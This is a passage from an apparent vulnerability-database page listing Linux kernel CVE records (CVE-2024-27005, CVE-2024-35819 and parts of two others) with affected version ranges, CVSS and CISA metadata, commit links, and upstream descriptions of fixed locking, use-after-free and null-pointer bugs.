                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_is_network_name_deleted()\n\nSkip sessions that are being teared down (status == SES_EXITING) to\navoid UAF."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:28.531Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f9414004798d9742c1af23a1d839fe6a9503751c"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa582b33f94453fdeaff1e7d0aa252c505975e01"
        },
        {
          "url": "https://git.kernel.org/stable/c/d919b6ea15ffa56fbafef4a1d92f47aeda9af645"
        },
        {
          "url": "https://git.kernel.org/stable/c/63981561ffd2d4987807df4126f96a11e18b0c1d"
        }
      ],
      "title": "smb: client: fix potential UAF in smb2_is_network_name_deleted()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35862",
    "datePublished": "2024-05-19T08:34:21.173Z",
    "dateReserved": "2024-05-17T13:50:33.107Z",
    "dateUpdated": "2026-01-05T10:35:28.531Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27005 (GCVE-0-2024-27005)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:28 – Updated: 2025-12-23 16:40

Title

interconnect: Don't access req_list while it's being manipulated

Summary

In the Linux kernel, the following vulnerability has been resolved: interconnect: Don't access req_list while it's being manipulated The icc_lock mutex was split into separate icc_lock and icc_bw_lock mutexes in [1] to avoid lockdep splats. However, this didn't adequately protect access to icc_node::req_list. The icc_set_bw() function will eventually iterate over req_list while only holding icc_bw_lock, but req_list can be modified while only holding icc_lock. This causes races between icc_set_bw(), of_icc_get(), and icc_put(). Example A: CPU0 CPU1 ---- ---- icc_set_bw(path_a) mutex_lock(&icc_bw_lock); icc_put(path_b) mutex_lock(&icc_lock); aggregate_requests() hlist_for_each_entry(r, ... hlist_del(... <r = invalid pointer> Example B: CPU0 CPU1 ---- ---- icc_set_bw(path_a) mutex_lock(&icc_bw_lock); path_b = of_icc_get() of_icc_get_by_index() mutex_lock(&icc_lock); path_find() path_init() aggregate_requests() hlist_for_each_entry(r, ... hlist_add_head(... <r = invalid pointer> Fix this by ensuring icc_bw_lock is always held before manipulating icc_node::req_list. The additional places icc_bw_lock is held don't perform any memory allocations, so we should still be safe from the original lockdep splats that motivated the separate locks. [1] commit af42269c3523 ("interconnect: Fix locking for runpm vs reclaim")

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fe549d8e976300d0d…
	https://git.kernel.org/stable/c/19ec82b3cad1abef2…
	https://git.kernel.org/stable/c/d0d04efa2e3679216…
	https://git.kernel.org/stable/c/4c65507121ea8e0b4…
	https://git.kernel.org/stable/c/de1bf25b6d771abdb…

Impacted products

Vendor

Product

Version

Linux

Affected: 9be2957f014d91088db1eb5dd09d9a03d7184dce , < fe549d8e976300d0dd75bd904eb216bed8b145e0 (git)
Affected: ee42bfc791aa3cd78e29046f26a09d189beb3efb , < 19ec82b3cad1abef2a929262b8c1528f4e0c192d (git)
Affected: af42269c3523492d71ebbe11fefae2653e9cdc78 , < d0d04efa2e367921654b5106cc5c05e3757c2b42 (git)
Affected: af42269c3523492d71ebbe11fefae2653e9cdc78 , < 4c65507121ea8e0b47fae6d2049c8688390d46b6 (git)
Affected: af42269c3523492d71ebbe11fefae2653e9cdc78 , < de1bf25b6d771abdb52d43546cf57ad775fb68a1 (git)
Affected: 2f3a124696d43de3c837f87a9f767c56ee86cf2a (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 6.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-27005",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-06T18:46:13.449387Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-05T15:17:57.462Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:33.949Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0d04efa2e367921654b5106cc5c05e3757c2b42"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c65507121ea8e0b47fae6d2049c8688390d46b6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de1bf25b6d771abdb52d43546cf57ad775fb68a1"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/interconnect/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fe549d8e976300d0dd75bd904eb216bed8b145e0",
              "status": "affected",
              "version": "9be2957f014d91088db1eb5dd09d9a03d7184dce",
              "versionType": "git"
            },
            {
              "lessThan": "19ec82b3cad1abef2a929262b8c1528f4e0c192d",
              "status": "affected",
              "version": "ee42bfc791aa3cd78e29046f26a09d189beb3efb",
              "versionType": "git"
            },
            {
              "lessThan": "d0d04efa2e367921654b5106cc5c05e3757c2b42",
              "status": "affected",
              "version": "af42269c3523492d71ebbe11fefae2653e9cdc78",
              "versionType": "git"
            },
            {
              "lessThan": "4c65507121ea8e0b47fae6d2049c8688390d46b6",
              "status": "affected",
              "version": "af42269c3523492d71ebbe11fefae2653e9cdc78",
              "versionType": "git"
            },
            {
              "lessThan": "de1bf25b6d771abdb52d43546cf57ad775fb68a1",
              "status": "affected",
              "version": "af42269c3523492d71ebbe11fefae2653e9cdc78",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2f3a124696d43de3c837f87a9f767c56ee86cf2a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/interconnect/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "5.15.133",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "6.1.55",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n  CPU0                               CPU1\n  ----                               ----\n  icc_set_bw(path_a)\n    mutex_lock(\u0026icc_bw_lock);\n                                     icc_put(path_b)\n                                       mutex_lock(\u0026icc_lock);\n    aggregate_requests()\n      hlist_for_each_entry(r, ...\n                                       hlist_del(...\n        \u003cr = invalid pointer\u003e\n\nExample B:\n\n  CPU0                               CPU1\n  ----                               ----\n  icc_set_bw(path_a)\n    mutex_lock(\u0026icc_bw_lock);\n                                     path_b = of_icc_get()\n                                       of_icc_get_by_index()\n                                         mutex_lock(\u0026icc_lock);\n                                         path_find()\n                                           path_init()\n    aggregate_requests()\n      hlist_for_each_entry(r, ...\n                                             hlist_add_head(...\n        \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T16:40:04.791Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fe549d8e976300d0dd75bd904eb216bed8b145e0"
        },
        {
          "url": "https://git.kernel.org/stable/c/19ec82b3cad1abef2a929262b8c1528f4e0c192d"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0d04efa2e367921654b5106cc5c05e3757c2b42"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c65507121ea8e0b47fae6d2049c8688390d46b6"
        },
        {
          "url": "https://git.kernel.org/stable/c/de1bf25b6d771abdb52d43546cf57ad775fb68a1"
        }
      ],
      "title": "interconnect: Don\u0027t access req_list while it\u0027s being manipulated",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27005",
    "datePublished": "2024-05-01T05:28:59.193Z",
    "dateReserved": "2024-02-19T14:20:24.207Z",
    "dateUpdated": "2025-12-23T16:40:04.791Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35819 (GCVE-0-2024-35819)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2025-05-04 12:55

Title

soc: fsl: qbman: Use raw spinlock for cgr_lock

Summary

In the Linux kernel, the following vulnerability has been resolved: soc: fsl: qbman: Use raw spinlock for cgr_lock smp_call_function always runs its callback in hard IRQ context, even on PREEMPT_RT, where spinlocks can sleep. So we need to use a raw spinlock for cgr_lock to ensure we aren't waiting on a sleeping task. Although this bug has existed for a while, it was not apparent until commit ef2a8d5478b9 ("net: dpaa: Adjust queue depth on rate change") which invokes smp_call_function_single via qman_update_cgr_safe every time a link goes up or down.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2b3fede8225133671…
	https://git.kernel.org/stable/c/ff50716b7d5b79859…
	https://git.kernel.org/stable/c/32edca2f03a6cc42c…
	https://git.kernel.org/stable/c/9a3ca8292ce9fdcce…
	https://git.kernel.org/stable/c/d6b5aac451c9cc12e…
	https://git.kernel.org/stable/c/54d26adf64c04f186…
	https://git.kernel.org/stable/c/f39d36b7540cf0088…
	https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd…
	https://git.kernel.org/stable/c/fbec4e7fed89b579f…

Impacted products

Vendor

Product

Version

Linux

Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < 2b3fede8225133671ce837c0d284804aa3bc7a02 (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < ff50716b7d5b7985979a5b21163cd79fb3d21d59 (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < 32edca2f03a6cc42c650ddc3ad83d086e3f365d1 (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < 9a3ca8292ce9fdcce122706c28c3f07bc857fe5e (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14 (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < 54d26adf64c04f186098b39dba86b86037084baa (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < f39d36b7540cf0088ed7ce2de2794f2aa237f6df (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < cd53a8ae5aacb4ecd25088486dea1cd02e74b506 (git)
Affected: 96f413f47677366e0ae03797409bfcc4151dbf9e , < fbec4e7fed89b579f2483041fabf9650fb0dd6bc (git)
Affected: a85c525bbff4d7467d7f0ab6fed8e2f787b073d6 (git)
Affected: 29cd9c2d1f428c281962135ea046a9d7bda88d14 (git)
Affected: 5b10a404419f0532ef3ba990c12bebe118adb6d7 (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35819",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:39:14.512560Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:43:06.859Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.550Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b3fede8225133671ce837c0d284804aa3bc7a02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff50716b7d5b7985979a5b21163cd79fb3d21d59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/32edca2f03a6cc42c650ddc3ad83d086e3f365d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9a3ca8292ce9fdcce122706c28c3f07bc857fe5e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54d26adf64c04f186098b39dba86b86037084baa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f39d36b7540cf0088ed7ce2de2794f2aa237f6df"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd25088486dea1cd02e74b506"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fbec4e7fed89b579f2483041fabf9650fb0dd6bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/soc/fsl/qbman/qman.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2b3fede8225133671ce837c0d284804aa3bc7a02",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "ff50716b7d5b7985979a5b21163cd79fb3d21d59",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "32edca2f03a6cc42c650ddc3ad83d086e3f365d1",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "9a3ca8292ce9fdcce122706c28c3f07bc857fe5e",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "54d26adf64c04f186098b39dba86b86037084baa",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "f39d36b7540cf0088ed7ce2de2794f2aa237f6df",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "cd53a8ae5aacb4ecd25088486dea1cd02e74b506",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "lessThan": "fbec4e7fed89b579f2483041fabf9650fb0dd6bc",
              "status": "affected",
              "version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a85c525bbff4d7467d7f0ab6fed8e2f787b073d6",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "29cd9c2d1f428c281962135ea046a9d7bda88d14",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "5b10a404419f0532ef3ba990c12bebe118adb6d7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/soc/fsl/qbman/qman.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.92",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.15.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoc: fsl: qbman: Use raw spinlock for cgr_lock\n\nsmp_call_function always runs its callback in hard IRQ context, even on\nPREEMPT_RT, where spinlocks can sleep. So we need to use a raw spinlock\nfor cgr_lock to ensure we aren\u0027t waiting on a sleeping task.\n\nAlthough this bug has existed for a while, it was not apparent until\ncommit ef2a8d5478b9 (\"net: dpaa: Adjust queue depth on rate change\")\nwhich invokes smp_call_function_single via qman_update_cgr_safe every\ntime a link goes up or down."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:49.933Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2b3fede8225133671ce837c0d284804aa3bc7a02"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff50716b7d5b7985979a5b21163cd79fb3d21d59"
        },
        {
          "url": "https://git.kernel.org/stable/c/32edca2f03a6cc42c650ddc3ad83d086e3f365d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a3ca8292ce9fdcce122706c28c3f07bc857fe5e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14"
        },
        {
          "url": "https://git.kernel.org/stable/c/54d26adf64c04f186098b39dba86b86037084baa"
        },
        {
          "url": "https://git.kernel.org/stable/c/f39d36b7540cf0088ed7ce2de2794f2aa237f6df"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd25088486dea1cd02e74b506"
        },
        {
          "url": "https://git.kernel.org/stable/c/fbec4e7fed89b579f2483041fabf9650fb0dd6bc"
        }
      ],
      "title": "soc: fsl: qbman: Use raw spinlock for cgr_lock",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35819",
    "datePublished": "2024-05-17T13:23:23.031Z",
    "dateReserved": "2024-05-17T12:19:12.343Z",
    "dateUpdated": "2025-05-04T12:55:49.933Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36023 (GCVE-0-2024-36023)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:04 – Updated: 2025-05-04 09:10

Title

Julia Lawall reported this null pointer dereference, this should fix it.

Summary

In the Linux kernel, the following vulnerability has been resolved: Julia Lawall reported this null pointer dereference, this should fix it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2e2177f94c0e0bc41…
	https://git.kernel.org/stable/c/214a6c4a28c11d670…
	https://git.kernel.org/stable/c/b972e8ac3f44f6931…
	https://git.kernel.org/stable/c/9bf93dcfc453fae19…

Impacted products

Vendor

Product

Version

Linux

Affected: f7ab093f74bf638ed98fd1115f3efa17e308bb7f , < 2e2177f94c0e0bc41323d7b6975a5f4820ed347e (git)
Affected: f7ab093f74bf638ed98fd1115f3efa17e308bb7f , < 214a6c4a28c11d67044e6cf3a0ab415050d9f03a (git)
Affected: f7ab093f74bf638ed98fd1115f3efa17e308bb7f , < b972e8ac3f44f693127a2806031962d100dfc4d1 (git)
Affected: f7ab093f74bf638ed98fd1115f3efa17e308bb7f , < 9bf93dcfc453fae192fe5d7874b89699e8f800ac (git)

Linux

Affected: 4.6
Unaffected: 0 , < 4.6 (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
